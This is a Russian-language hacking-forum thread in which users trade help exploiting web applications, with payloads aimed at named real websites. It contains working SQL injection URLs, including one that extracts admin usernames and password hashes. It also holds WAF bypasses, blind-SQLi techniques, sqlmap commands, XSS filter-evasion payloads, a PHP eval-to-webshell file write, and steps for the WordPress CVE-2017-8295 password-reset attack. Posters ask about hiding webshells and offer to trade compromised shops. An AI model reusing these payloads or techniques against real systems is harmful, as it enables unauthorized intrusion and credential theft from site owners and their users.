DezMond™ said:
↑ (https://antichat.live/posts/4359159/)
помогите ваф обойти

Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+



Если только WAF беспокоит, то:


Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+select(wafbypass),2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+and+union+select,1,2,3,4,5,6,7,8,9,10,11,12 ,13,14+--+

DezMond™ said:
↑ (https://antichat.live/posts/4359159/)
помогите ваф обойти

Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+



Либо крутим подзапрос в uid. uid=(if((select 1),10,0)), либо другое значение искать...

Pop-Xlop said:
↑ (https://antichat.live/posts/4359418/)
Если только WAF беспокоит, то:

Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+select(wafbypass),2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+and+union+select,1,2,3,4,5,6,7,8,9,10,11,12 ,13,14+--+



ну естественно синтаксис соблюдать, с ошибками он и так проходит

DezMond™ said:
↑ (https://antichat.live/posts/4359159/)
помогите ваф обойти

Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+



После + поставь select

BabaDook said:
↑ (https://antichat.live/posts/4359468/)
После + поставь select


ваф срабатывает, по этому не полный запрос) при чём ваф работает когда запрос выполняется без ошибок, даже если в конце убрать --

dell

o314um said:
↑ (https://antichat.live/posts/4360913/)
столкнулся с ситуацией, когда есть веб шелл, есть правки на файлы и правки вносятся. Но когда загружаешь страницу из http - правок, что внес - нет. так же и с файлами. Заливаешь текстовый файл, а при открытии - 404. Права стоят верные. Через веб шелл смотришь - файл есть.либо правки в существующих. А сайт работает как и работал.
Что тут может быть?


Файловый кеш сервера + метка модификации файла не меняется. Либо не на тот сервак правки вносите, такое тоже бывает)

Уверены, что не балансер?

Привет помогите раскрутить

https://makler.md/ru/an/search/?query= (https://makler.md/ru/an/search/?query=+aaaaaaa/*+bbbbbb\%22+cccccc+*/)\" Ошибка

https://makler.md/ru/an/search/?query=\" (https://makler.md/ru/an/search/?query=\%22%22)" Нет Oшибке

https://makler.md/ru/an/search/?query=\"+/* (https://makler.md/ru/an/search/?query=\%22+/*) Другая Ошибка

Многое намекает на инъекцию правда не понятно как начать раскрутку

kostea said:
↑ (https://antichat.live/posts/4361242/)
Привет помогите раскрутить
https://makler.md/ru/an/search/?query= (https://makler.md/ru/an/search/?query=+aaaaaaa/*+bbbbbb\%22+cccccc+*/)
\" Ошибка
https://makler.md/ru/an/search/?query=\" (https://makler.md/ru/an/search/?query=\%22%22)
" Нет Oшибке
https://makler.md/ru/an/search/?query=\"+/* (https://makler.md/ru/an/search/?query=\%22+/*)
Другая Ошибка
Многое намекает на инъекцию правда не понятно как начать раскрутку


Почему тогда у этих многих не спросить?

Лично я не вижу там ничего

Сканирую сканером сайт. Сегодня акунетикс выдал такой лог


Code:
The vulnerability affects http://www.site.com/login.php , Client-IP

Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script

Attack details

HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Tests performed:

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request

GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Пишет Blind SQL. Как крутить такое?

Andrey979 said:
↑ (https://antichat.live/posts/4362274/)
Сканирую сканером сайт. Сегодня акунетикс выдал такой лог

Code:
The vulnerability affects http://www.site.com/login.php , Client-IP

Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script

Attack details

HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Tests performed:

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request

GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Пишет Blind SQL. Как крутить такое?


Логично как пишет, Blind SQL! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3

winstrool said:
↑ (https://antichat.live/posts/4362279/)
Логично как
пишет, Blind SQL
! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3


Я не совсем понял как правильно скормить запрос мапу..

sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs так?

Andrey979 said:
↑ (https://antichat.live/posts/4362288/)
Я не совсем понял как правильно скормить запрос мапу..
sqlmap -u
http://www.site.com/login.php
--technique=B --level=5 --dbs так?


sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs --form

ci0b2n1feec said:
↑ (https://antichat.live/posts/4362344/)
Есть уязвимый код
```
include(DB_DIR . '/lang/' . $global_arr['id'] . '.php');
```
Как видете LFI
PHP 5.3.8 %00 не помог, за помощь готов финансово отблагодарить!


Ты уже задавал данный вопрос. Вариантов не так много

./ .\ \\ // ? /[…]//

BabaDook said:
↑ (https://antichat.live/posts/4362351/)
Ты уже задавал данный вопрос. Вариантов не так много
./ .\ \\ // ? /[…]//


пробовал нечего не помогло

ci0b2n1feec said:
↑ (https://antichat.live/posts/4362344/)
Есть уязвимый код
```
include(DB_DIR . '/lang/' . $global_arr['id'] . '.php');
```
Как видете LFI
PHP 5.3.8 %00 не помог, за помощь готов финансово отблагодарить!


Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...

winstrool said:
↑ (https://antichat.live/posts/4362396/)
Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...


Это тоже пробовали, нечего интересного) Интересует что то типо NULL байт, как было в старых версиях

winstrool said:
↑ (https://antichat.live/posts/4362279/)
Логично как
пишет, Blind SQL
! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3


Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP

Andrey979 said:
↑ (https://antichat.live/posts/4362451/)
Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP


Там где угодно можно задать, тут с подобными вопросами вам уже в ветку

Вопросы по SQLMap (https://antichat.live/threads/431199/unread/)

Кто знает, как реализовать этот експлойт https://www.exploit-db.com/exploits/41963/

Нашел шоп с этой уязвимостью, немного разобрал, что можно сбросить пасс админа с помощью этого скрипта без авторизации. Перепробовав все варианты, ничего не выходит. Кто сталкивался?

Andrey979 said:
↑ (https://antichat.live/posts/4362775/)
Кто знает, как реализовать этот експлойт
https://www.exploit-db.com/exploits/41963/
Нашел шоп с этой уязвимостью, немного разобрал, что можно сбросить пасс админа с помощью этого скрипта без авторизации. Перепробовав все варианты, ничего не выходит. Кто сталкивался?


Там много зависимостей для этого уязвимости, нужно что бы мыло админа было admin@site.com (mailto:admin@site.com) только тогда ты сможешь отправить на свое мыло его код эсплойт ест на гитхабе загугль

CVE:2017-8295 (https://nvd.nist.gov/vuln/detail/CVE-2017-8295) github на питоне будет

ci0b2n1feec said:
↑ (https://antichat.live/posts/4362781/)
Там много зависимостей для этого уязвимости, нужно что бы мыло админа было
admin@site.com (mailto:admin@site.com)
только тогда ты сможешь отправить на свое мыло его код эсплойт ест на гитхабе загугль
CVE:
2017-8295 (https://nvd.nist.gov/vuln/detail/CVE-2017-8295) github на питоне будет


С чего вы решили что мыло админа должно быть admin@site.com (mailto:admin@site.com)? Вот первоисточник (https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html). Что-бы сбросить пасс, вам нужно 3 вещи:


Знать логин админа

Вам надо создать ящик wordpress@ваш-домейн.нет

Вам нужно, что-бы ящик самого админа был не доступен или же это мыло с кодом для сброса пароля было откинуто и вам на ящик под вашим контролем (wordpress@ваш-домейн.нет) пишла копия этого мыла.
Тогда вы сможете с помощью ссылки в мыле скинуть пароль админа.

fandor9 said:
↑ (https://antichat.live/posts/4363408/)
С чего вы решили что мыло админа должно быть
admin@site.com (mailto:admin@site.com)
? Вот
первоисточник (https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html)
. Что-бы сбросить пасс, вам нужно 3 вещи:

Знать логин админа

Вам надо создать ящик wordpress@ваш-домейн.нет

Вам нужно, что-бы ящик самого админа был не доступен или же это мыло с кодом для сброса пароля было откинуто и вам на ящик под вашим контролем (wordpress@ваш-домейн.нет) пишла копия этого мыла.

Тогда вы сможете с помощью ссылки в мыле скинуть пароль админа.


ну на заборе тоже сам знаешь что написано, попробуй и поймешь

ci0b2n1feec said:
↑ (https://antichat.live/posts/4363628/)
ну на заборе тоже сам знаешь что написано, попробуй и поймешь


Что на заборе написано, что мыло вордпресс админа должно "admin@site.com (mailto:admin@site.com)" быть?

fandor9 said:
↑ (https://antichat.live/posts/4363743/)
Что на заборе написано, что мыло вордпресс админа должно "
admin@site.com (mailto:admin@site.com)
" быть?


Ну ты проведи атаку и увидишь что успеха будет ноль!Уязвимость связана с подменой host сервера если у админа мыло 123@gmail.com (mailto:eblanfandor9@gmail.com) и твой майл сервер ebanko.ru а жертва vk.com, то у тебу получиться подменить только gmail.com на ebanko.ru а eblanfandor9 ты не как не заменишь.Если что то не пробывал и не пробивал не стоит сувать свой нос отталкиваясь от мануалов.

Ребята, заканчивайте, есть public disclosure (https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html), там всё чётко написано. Этот спор, с выяснениями, кто еблан, а кто красавчик, и что на заборе написано, ни к чему хорошему не приведёт. Если хочется, кайфуйте в ЛС.

Уязвимость, очень редкая, должна совпасть куча зависимостей, но если по простому:


Настройка виртуального хоста веб-сервера Apache, должна допускать возможность Host Header Injection

sendmail не должен доставить письмо по легитимному адресу (DoS, DDoS, DNS spoofing, etc). Либо мыло админа должно быть невалидным.

HTTP_HOST атакующего должен уметь принимать почту (привет temp-mail.org)
@ci0b2n1feec (https://antichat.live/members/327458/), есть большой опыт эксплуатации подобных уязвимостей? Комьюнити скажет только спасибо, если просветите и покажите как нужно и почему оно так.

ci0b2n1feec said:
↑ (https://antichat.live/posts/4363791/)
если у админа мыло
123@gmail.com (mailto:eblanfandor9@gmail.com)
Если что то не пробывал и не пробивал не стоит сувать свой нос отталкиваясь от мануалов.


НЕ стоит хамить.


ci0b2n1feec said:
↑ (https://antichat.live/posts/4363791/)
у тебу получиться подменить только gmail.com на ebanko.ru а 123 ты не как не заменишь.


я этого нигде и не писал. Прочтите внимательно что я написал.

Если вы не понимаете атаку, то не это не значит что она не работает. Там несколько условий для успешного выполнения. Ещё раз на пальцах:


Для сбросе пароля вам нужно знать мыло админа. Допустим оно wp-admin@mail.ru (https://antichat.com/members/327458/)

При отправке мыло на сброс пароля отправляется от адреса wordpress@wp-site.ru (mailto:wordpress@wp-site.ru) на адрес wp-admin@mail.ru (mailto:wp-admin@mail.ru). В этой версии вордпресса при отправке POST-запроса заменяется в мыле отправителя домейн на то что вы передали в заголовке Host. Допустим там будет стоять Host: super-mail.ru. Тогда админу на почту wp-admin@mail.ru (mailto:wp-admin@mail.ru) вышлется мыло от wordpress@super-mail.ru.

Ну и теперь самое сложное, это мыло либо должно быть заблокировано майл-сервером админа и отброшено назад отправителю (wordpress@super-mail.ru) либо админ должен ответить с копией этого мыла отправителю(ещё менее вероятно). И только тогда получаем заветное мыло с кодом сброса пароля.
Ясен пень что это очень редко где сработает.

Expression Language injection

Есть мануалы подробные, или есть люди которые смогут раскрутить ?

Sensoft said:
↑ (https://antichat.live/posts/4364633/)
Expression Language injection
Есть мануалы подробные, или есть люди которые смогут раскрутить ?


Сань, ну переведи, или в гугл вбей

BabaDook said:
↑ (https://antichat.live/posts/4364634/)
Сань, ну переведи, или в гугл вбей


Да она блять в заголовках

Не получается

есть много скуль шопов с файловыми привелегиями,научите заливать шелл через через мап или бурп через тимку напрмиер или так обьясните,взамен получите шоп с залитым вами шеллом.жду предложений в личку

Есть загрузка файлов принимает любое расширение но вот файл обрабатывается и нагрузка из содержимого меняется


Code:
CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80

kostea said:
↑ (https://antichat.live/posts/4367422/)
но вот файл обрабатывается и нагрузка из содержимого меняется


https://antichat.com/threads/468084/

crlf said:
↑ (https://antichat.live/posts/4367455/)
https://antichat.com/threads/468084/


Сп но не хочет крокозябры

Всем привет, никак не могу найти админку opencart, по стандартному пути /admin, сканерами, все пробовал. Нашел разве что лог, по нему админка /admin но не заходит, в чем может быть проблема или может есть какие-нибудь обходные пути?

pinch said:
↑ (https://antichat.live/posts/4369223/)
Всем привет, никак не могу найти админку opencart, по стандартному пути /admin, сканерами, все пробовал. Нашел разве что лог, по нему админка /admin но не заходит, в чем может быть проблема или может есть какие-нибудь обходные пути?


Сканер директорий, братан.

pinch said:
↑ (https://antichat.live/posts/4369223/)
Всем привет, никак не могу найти админку opencart, по стандартному пути /admin, сканерами, все пробовал. Нашел разве что лог, по нему админка /admin но не заходит, в чем может быть проблема или может есть какие-нибудь обходные пути?


Cловари просто не те наверное. Может изврат в путях к админке, или вообще на сабдомене admin.site.com

Есть страница admin.php где Blind XSS, HttpOnly, в админку не попасть.

Вопрос как сделать так чтоб через XSS показать админу фишенговую login.php на самой admin.php, также реализовать так что бы при вводе пароля показывалось обратно admin.php?

Есть что то готовое?

Octavian said:
↑ (https://antichat.live/posts/4370578/)
Есть страница admin.php где Blind XSS, HttpOnly, в админку не попасть.
Вопрос как сделать так чтоб через XSS показать админу фишенговую login.php на самой admin.php, также реализовать так что бы при вводе пароля показывалось обратно admin.php?
Есть что то готовое?


BeEF XSS

Pop-Xlop said:
↑ (https://antichat.live/posts/4370623/)
BeEF XSS


Круто, а онлайн что то бодобное нету?

Есть XSS, не пускает только пробелы, ; , /, null byte.

Как выполнить XSS , чем заменить пробел?

Или я могу тагже открыть

XSS

HTML

JS

Как можно раскоментировать HTML без / что бы получить что то такое

alert(1) /* HTML JS

Пробовал но непонятно как передавать символ через URL

http://jsfiddle.net/23sqP/3/

Octavian said:
↑ (https://antichat.live/posts/4371092/)
Есть XSS, не пускает только пробелы, ; , /, null byte.
Пробовал но непонятно как передавать символ через URL
http://jsfiddle.net/23sqP/3/


Через URI (https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Global_Objects/encodeURI) кодировку:


Code:
encodeURI("")
?xss="%3Csvg%0Conload=alert(1)%3E"

fandor9 said:
↑ (https://antichat.live/posts/4371150/)
Через
URI (https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Global_Objects/encodeURI)
кодировку:

Code:
encodeURI("")
?xss="%3Csvg%0Conload=alert(1)%3E"



Сп, но не хочет пропускать %0C

Octavian said:
↑ (https://antichat.live/posts/4371167/)
Сп, но не хочет пропускать %0C


попробуйте double encoding


Code:
%22%253Csvg%250Conload%3Dalert%281%29%253E%22

или же


Code:

fandor9 said:
↑ (https://antichat.live/posts/4371169/)
попробуйте double encoding

Code:
%22%253Csvg%250Conload%3Dalert%281%29%253E%22

или же

Code:




Нет, выхода нет, только так что то придумать

alert(1) /* HTML JS

Я открываю Script и уже нахожусь в Javascript теге но не могу составить что то валидное и за мусора "HTML JS"

Даже HTML коменарий пропускает, но если я нохожусь в javascript он не работает

alert(1)

[QUOTE="Octavian"]
Octavian said:
↑ (https://antichat.live/posts/4371191/)
Даже HTML коменарий пропускает, но если я нохожусь в javascript он не работает
alert(1)alert(1)

fandor9 said:
↑ (https://antichat.live/posts/4371194/)
в JS комментарии с помощью //comment или /* comment */


/ не пускает и все портит

Подскажите заливаю себе wso шелл на вордпрес (изучаю )ю хостинг сайта блокирует wso.php файл и мое айпи. Как маскировать шелл ?

Хелп, помогите раскрутить


Code:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/

DezMond™ said:
↑ (https://antichat.live/posts/4375185/)
Хелп, помогите раскрутить

Code:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/



/sozialrecht/publikationen/detail/publication/a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(concat_ws(0x3a,username,password)))from(be_us ers)))))='a/

a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(substring(password,20,30)))from(be_users)wher e(username='rtisch')))))='a/

Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы

pinch said:
↑ (https://antichat.live/posts/4376055/)
Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы


Мониторинг трафика требует прямого обращение к сетевому интерфейсу и потому права рута (ну или права группы netdev). Возможно настроить апач (https://www.simplified.guide/apache/log-post)/nginx (https://danielmiessler.com/blog/log-post-data-nginx/) что-бы они все сливали в лог. Вариант номер 3 это приписать логирование в приложение.

Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю

holdik said:
↑ (https://antichat.live/posts/4386609/)
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю


создать файл, данные постом передать

holdik said:
↑ (https://antichat.live/posts/4386609/)
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю


Запрещены где ? На хосте или waf-ом ?

подскажите как заюзать и достать бд


Code:
?search=-")+or+1=1+limit+10--+-

выодит 10 записей


Code:
?search=-")+order+by+1--+-

ошибки нет, но при order by 2 ошибка


Code:
?search=-")+union+select+1--+-

не выводит "1".

думал там какая то разновидность такого запроса. то есть вероятней всего результат первого запроса (уявимого) передается в WHERE для второго запроса


Code:
ids = SELECT id FROM users
WHERE group="XXXX" AND (name LIKE "%$GET['search']%" OR email LIKE "%$GET['search']%"
)
SELECT * FROM users WHERE id IN(ids)

сделал запрос типа


Code:
?search=-")+union+select+217--+-

где 217 это мой id. но результат пустой(

Есть новость что воровали банковские данные через иконку сайта, мол иконка выдавалась на всех страницах но на сранице оплаты выдавался js файл keylogger. Это как что за тэг там был что работал и favicon и js?

https://www.bleepingcomputer.com/ne...te-favicon-to-camouflage-credit-card-skimmer/ (https://www.bleepingcomputer.com/news/security/hackers-use-website-favicon-to-camouflage-credit-card-skimmer/)

апдейт к предыдущему посту.


Code:
") union select 1 -- -

ошибка нет, 1 не выводит


Code:
") or id=2 union select 1 -- -

ошибка

что за ошибка?

ms13 said:
↑ (https://antichat.live/posts/4387992/)
что за ошибка?


ошибка не бд. просто человекоподобная, типа "Something went wrong"

небольшие размышления. синтаксис select такой


Code:
SELECT [STRAIGHT_JOIN]

[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]

[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] [HIGH_PRIORITY]

[DISTINCT | DISTINCTROW | ALL]

select_expression,...

[INTO {OUTFILE | DUMPFILE} 'file_name' export_options]

[FROM table_references

[WHERE where_definition]

[GROUP BY {unsigned_integer | col_name | formula} [ASC | DESC], ...]

[HAVING where_definition]

[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC], ...]

[LIMIT [offset,] rows]

[PROCEDURE procedure_name]

[FOR UPDATE | LOCK IN SHARE MODE]]

когда использую `ORDER BY1` или `LIMIT 1`, то нет ошибок. но при использование `GROUP BY1` ошибка. то есть вроятней иньекция находится после GROUP BY, думаю ок, наверное поиск реализован в HAVING. попробовал `HAVING 1=1`, ошибки нет. но использовать два `HAVING` нельзя

holdik said:
↑ (https://antichat.live/posts/4386609/)
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю




Code:
rce=@file_put_contents($_POST[f],$_POST[c]);&f=./filename.php&c=



FireRidlle said:
↑ (https://antichat.live/posts/4387841/)

Code:
") or id=2 union select 1 -- -

ошибка




Code:
")*-1 UNION SELECT 1 -- если вывода нет, чекаем дальше
")*-1 UNION SELECT "'\"\\" -- // если ошибка, значит результат уходит в другой запрос, крутим по обстоятельствам
") OR SUBSTRING((SELECT VERSION()),1,1)=5 LIMIT 1 -- // boolean based true, есть вывод чего либо
") OR SUBSTRING((SELECT VERSION()),1,1)=1 LIMIT 1 -- // boolean based false, вывода нет
") AND IF(SUBSTRING((SELECT VERSION()),1,1)=5,SLEEP(100),SLEEP(0)); -- // крутим time based



Octavian said:
↑ (https://antichat.live/posts/4387346/)
Есть новость что воровали банковские данные через иконку сайта, мол иконка выдавалась на всех страницах но на сранице оплаты выдавался js файл keylogger. Это как что за тэг там был что работал и favicon и js?
https://www.bleepingcomputer.com/ne...te-favicon-to-camouflage-credit-card-skimmer/ (https://www.bleepingcomputer.com/news/security/hackers-use-website-favicon-to-camouflage-credit-card-skimmer/)


Оригинал: https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/

Cервер отдавал JS только при "правильных" реферах, иначе выплёвывалась картинка. Браузер не подгружает левые майм типы для скриптов (script src) и ошибок никаких не возникает. А сделан сей трик, по всей видимости, для затруднения детекта автоматическими сканерами и анализаторами безопасности.

Статья немного вводит в заблуждение

crlf said:
↑ (https://antichat.live/posts/4388089/)

Code:
")*-1 UNION SELECT 1 -- если вывода нет, чекаем дальше
")*-1 UNION SELECT "'\"\\" -- // если ошибка, значит результат уходит в другой запрос, крутим по обстоятельствам
") OR SUBSTRING((SELECT VERSION()),1,1)=5 LIMIT 1 -- // boolean based true, есть вывод чего либо
") OR SUBSTRING((SELECT VERSION()),1,1)=1 LIMIT 1 -- // boolean based false, вывода нет
") AND IF(SUBSTRING((SELECT VERSION()),1,1)=5,SLEEP(100),SLEEP(0)); -- // крутим time based





Code:
")*-1 UNION SELECT 1 -- если вывода нет, чекаем дальше

вывода и ошибки нет. но если левый запрос, который перед union вернет хотя бы одну строку то будет ошибка. например


Code:
com%")*-1 UNION SELECT 1

а что значит "*-1" ?

FireRidlle said:
↑ (https://antichat.live/posts/4388117/)
а что значит "*-1" ?


Простое произведение, при котором получается отрицательное значение


FireRidlle said:
↑ (https://antichat.live/posts/4388117/)
вывода и ошибки нет. но если левый запрос, который перед union вернет хотя бы одну строку то будет ошибка. например


Запрос может быть сложный, многострочный, результат уходить в другой запрос, но при этом фильтроваться корректно и т.д. и т.п. Чтоб не гадать на кофейной гуще, можно считать текущий запрос посимвольно, как-то так:


Code:
SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"

crlf said:
↑ (https://antichat.live/posts/4388122/)
Простое произведение, при котором получается отрицательное значение
Запрос может быть сложный, многострочный, результат уходить в другой запрос, но при этом фильтроваться корректно и т.д. и т.п. Чтоб не гадать на кофейной гуще, можно считать текущий запрос посимвольно, как-то так:

Code:
SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"



нашел способ быстро крутить запрос по символам


Code:
sdfsdf") or id=(select INSTR(' !"#`$%&()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_', (SELECT SUBSTRING(INFO,1,1) FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%selfquery%"))) or ("qwerty

мб кому то будет полезно))

нашел запрос (ps: все записал в апперкейсе так как INSTR caseinsensetive и не стал парится по этому поводу)


Code:
SELECT
`USERS`.*,
(
SELECT COUNT(*) FROM `USERS` AS `LARAVEL_RESERVED_0`
WHERE `USERS`.`ID` = `LARAVEL_RESERVED_0`.`REFERRER_ID` AND`LARAVEL_RESERVED_0`.`DELETED_AT` IS NULL
) AS `REFERRALS_COUNT`
FROM `USERS`
WHERE `REFERRER_ID` = ? AND(
`EMAIL` LIKE ? OR `IP` LIKE ?
OR CONCAT_WS('', LAST_NAME, '', NAME, '', MIDDLE_NAME) LIKE "%{INJECTION_HERE}%" OR `id`= ?) AND `USERS`.`DELETED_AT` IS NULL ORDER BY `ID` DESC LIMIT 20 OFFSET 0

вместо всех вопросов подставляется $_GET['search'] кроме `REFERRER_ID` = ?

но уязвивымый только CONCAT_WS('', LAST_NAME, '', NAME, '', MIDDLE_NAME) так как он идет в обход prepard statement

если там многострочный запрос, то думаю так обходить


Code:
notfound") union select *, 134 as 'referrals_count' from users where id=1 or (name="

снова ошибка....хотя локально воспроизвел и все ок

и не могу понять почему `notfound") union select 1 from users where id=1 or (name="` ошибок нет. но если убрать notfound то ошибка

сайт под cloudflare. мб как то фильтрует

количество колонок в таблице users = 36. +1 за REFERRALS_COUNT

попробовал union select 1,2,....37 ---

ошибка(

еще немного инфы


Code:
") or 1=1 limit 10 offset 0 -- -

возвращает первые 10


Code:
") or 1=1 limit 10 offset 1 -- -

ничего не возвращает


Code:
") or id=(select count(*) from users where id in (1,2,3,4) limit 1) -- -

выводит запись под id=4. как так? мозг кипит...

FireRidlle said:
↑ (https://antichat.live/posts/4388181/)
нашел способ быстро крутить запрос по символам


Советую ознакомиться с техниками которые описаны на rdot.org, там гуру скуль инъекций дожали из блайндов всё что можно и даже больше.


FireRidlle said:
↑ (https://antichat.live/posts/4388181/)
если там многострочный запрос, то думаю так обходить


Конкретно в этом запросе обходить ничего не нужно, инъекция находится в последней строке и многострочность не мешает. Другое дело, когда мы вклиниваемя в подзапрос, к примеру.


FireRidlle said:
↑ (https://antichat.live/posts/4388181/)
снова ошибка....хотя локально воспроизвел и все ок
и не могу понять почему `notfound") union select 1 from users where id=1 or (name="` ошибок нет. но если убрать notfound то ошибка


Смею предположить, что запрос не тот, иначе это выглядит как минимум странно Каким образом был прочитан текущий запрос? Нужно постараться прочитать именно тот, где внедряется конструкция "UNION SELECT" и в зависимости от логики, найти два состояния, чтоб читать булеевым методом, либо работать по времени. Вот пара абстрактных примеров:


Code:
")*-1 UNION SELECT 1 FROM (SELECT 1)a WHERE SUBSTRING((SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"),1,1)="S" -- 1
")*-1 UNION SELECT IF(SUBSTRING((SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"),1,1)="S",SLEEP(2),SLEEP(0)) -- 1

crlf said:
↑ (https://antichat.live/posts/4388518/)
Каким образом был прочитан текущий запрос?


вот так


Code:
sdfsdf") or id=(select INSTR(' !"#`$%&()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_', (SELECT SUBSTRING(INFO,1,1) FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%selfquery%"))) or ("qwerty



crlf said:
↑ (https://antichat.live/posts/4388518/)
Смею предположить, что запрос не тот, иначе это выглядит как минимум странно


согласен. но как обьяснить вот это


Code:
?search=com // возвращает строки с `com`
?search=qwerty // нет строк с таким вхождением
com") union select 1 -- - // ошибка
qwerty") union select 1 -- - // ошиби нет, ничего не возвращает

FireRidlle said:
↑ (https://antichat.live/posts/4388525/)
но как обьяснить вот это


Вполне возможно, что имеет место серия уязвимых к внедрению запросов. И тот который считался, идёт раньше того, в котором совершается выборка одного поля, поэтому, как указал ранее, нужно получить запрос в котором UNION успешно отрабатывает и отталкиваться от него. Но и это, не гарантирует успешного видимого вывода, но понять происходящее лучше, должно помочь.

crlf said:
↑ (https://antichat.live/posts/4388541/)
Вполне возможно, что имеет место серия уязвимых к внедрению запросов. И тот который считался, идёт раньше того, в котором совершается выборка одного поля, поэтому, как указал ранее, нужно получить запрос в котором UNION успешно отрабатывает и отталкиваться от него. Но и это, не гарантирует успешного видимого вывода, но понять происходящее лучше, должно помочь.


спасибо. таки да, есть второй запрос для пагинации


Code:
